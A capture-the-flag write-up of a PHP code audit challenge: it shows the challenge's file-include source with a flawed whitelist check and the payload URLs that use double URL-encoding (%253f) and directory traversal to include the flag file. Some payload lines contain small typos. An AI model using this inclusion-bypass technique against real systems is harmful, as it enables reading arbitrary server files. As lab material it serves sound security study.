According to the challenge hint, this is a PHP code audit.
1. Start the target machine.
2. View the page source (F12).
The source contains a file include.
3. http://38f872fd-deb7-42aa-b8f9-34449a4a6227.node4.buuoj.cn/source.php
<?php
highlight_file(__FILE__); // highlight this file's source
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; // whitelist
        if (! isset($page) || !is_string($page)) { // was a value passed?
            echo "you can't see it";
            return false;
        }

        if (in_array($page, $whitelist)) { // is the parameter in the whitelist?
            return true;
        }

        $_page = mb_substr( // check whether the part before '?' is in the whitelist
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page); // a second URL decode; keep this in mind when building the parameter
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
From the code above we can construct the payload: path /source.php?file=source.php%253fffffllllaaaagggg as the parameter.
(The hint about ffffllllaaaagggg is in hint.php.)
4. The payload does not open, which shows the file is not at this directory level, so try each level in turn:
/source.php?file=source.php%253../fffffllllaaaagggg
/source.php?file=source.php%253../../fffffllllaaaagggg
...
...
/source.php?file=source.php%253f../../../../../fffffllllaaaagggg
The challenge is fairly basic; I found a few write-ups of it on the CSDN forum, which are basically enough to explain the steps for this challenge.